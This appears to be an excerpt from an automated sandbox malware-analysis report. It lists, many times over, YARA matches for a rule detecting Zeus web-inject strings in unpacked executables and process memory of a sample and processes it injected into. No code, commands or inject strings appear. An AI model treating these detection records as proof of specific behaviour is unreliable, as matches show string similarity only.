Source: 2.2.svchost.exe.2a56c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 32.2.nFjEHtbDTFjy.exe.3042000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.nFjEHtbDTFjy.exe.20f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 14.2.nFjEHtbDTFjy.exe.2ae0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.nFjEHtbDTFjy.exe.1472000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.nFjEHtbDTFjy.exe.2f20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.22.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.nFjEHtbDTFjy.exe.28f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.nFjEHtbDTFjy.exe.2172000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.nFjEHtbDTFjy.exe.2be2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nFjEHtbDTFjy.exe.690000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.nFjEHtbDTFjy.exe.2ef0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 32.2.nFjEHtbDTFjy.exe.32f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.888400.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nFjEHtbDTFjy.exe.20d2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.888400.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.nFjEHtbDTFjy.exe.20f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nFjEHtbDTFjy.exe.29a2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2ab0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.nFjEHtbDTFjy.exe.2ba0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.9.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.OjKmJJm2YT.exe.840698.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.nFjEHtbDTFjy.exe.2d82000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.nFjEHtbDTFjy.exe.2d92000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.32.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.OjKmJJm2YT.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.nFjEHtbDTFjy.exe.2be2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.nFjEHtbDTFjy.exe.2490000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.nFjEHtbDTFjy.exe.2ef0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.nFjEHtbDTFjy.exe.2f20000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.nFjEHtbDTFjy.exe.28f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.OjKmJJm2YT.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nFjEHtbDTFjy.exe.690000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.nFjEHtbDTFjy.exe.2490000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.nFjEHtbDTFjy.exe.29f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.OjKmJJm2YT.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1734478353.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1743033227.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1680369624.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1796972429.0000000001470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1339491124.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2594045872.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000022.00000002.1732800865.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1733978576.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.1711573313.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1722129332.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001A.00000002.1714288290.0000000002490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.1710398106.0000000002170000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1674029436.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.1734272872.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.1733713050.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1342128080.0000000002AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1739375869.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000026.00000002.1740627207.0000000002560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1339398735.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000020.00000002.1727055107.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1675730840.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1742192775.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1797084342.00000000014D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1738952531.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1745221620.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1716460061.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1781805646.0000000000630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000026.00000002.1741539824.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000B.00000002.1783966144.0000000002D90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.1708419201.0000000002BA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1744096234.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.1711007542.0000000000D90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001E.00000002.1723103322.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000020.00000002.1726470289.0000000003040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1739760452.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.1718939420.0000000002B00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.1711887152.0000000002A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000B.00000002.1784273852.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1673174622.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1707472657.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1710147215.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001E.00000002.1724014803.0000000002480000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1740206618.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1678394504.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000E.00000002.1695271087.0000000002AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1736767365.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1737316338.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.1707606160.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2594045872.0000000002A56000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1703776736.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1741195616.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.1718079972.00000000029A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1782040973.0000000000690000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000007.00000002.1781782931.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1690060462.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000E.00000002.1692126085.0000000002A80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1730745096.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2594339878.0000000002C13000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001A.00000002.1713723787.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1746920664.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1734938590.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000007.00000002.1782094924.0000000002DC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1713404140.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1747674947.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000022.00000002.1733188359.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1745970801.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1726563792.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1744700906.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: OjKmJJm2YT.exe PID: 1956, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 1512, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 5368, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6928, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 3816, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 4976, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6472, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 3132, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 2316, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 7132, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 896, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 7144, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 5684, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6424, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6204, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 824, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 4612, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Yara matchFile source: 2.3.svchost.exe.883000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.OjKmJJm2YT.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.3.OjKmJJm2YT.exe.83b298.1.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.OjKmJJm2YT.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
